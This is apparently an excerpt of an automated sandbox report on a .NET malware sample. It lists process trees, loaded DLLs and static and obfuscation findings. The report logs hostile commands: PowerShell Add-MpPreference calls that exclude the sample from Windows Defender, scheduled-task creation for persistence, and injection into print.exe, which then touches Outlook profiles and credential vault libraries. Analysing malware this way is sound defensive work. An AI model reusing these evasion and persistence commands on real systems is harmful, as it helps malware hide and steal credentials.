                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeProcess created: C:\Windows\SysWOW64\print.exe "C:\Windows\SysWOW64\print.exe"
                    Source: C:\Windows\SysWOW64\print.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"Jump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeProcess created: C:\Windows\SysWOW64\print.exe "C:\Windows\SysWOW64\print.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\print.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\UnmxRI.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                    Source: UnmxRI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UnmxRI.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: UnmxRI.exeStatic file information: File size 1097216 > 1048576
                    Source: UnmxRI.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x10b400
                    Source: UnmxRI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: UnmxRI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: firefox.pdbP source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: UnmxRI.pdbSHA2561 source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
                    Source: Binary string: UnmxRI.pdb source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
                    Source: Binary string: print.pdbGCTL source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152182094.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4494232519.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: wntdll.pdbUGP source: UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: UnmxRI.exe, UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: print.pdb source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, Ft.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, Ft.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, Ft.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, Ft.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    .NET source code contains potential unpacker
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs.Net Code: ovtD1TeSxq System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs.Net Code: ovtD1TeSxq System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, fLjEu4070dl47BbVwy.cs.Net Code: hwUiEND30
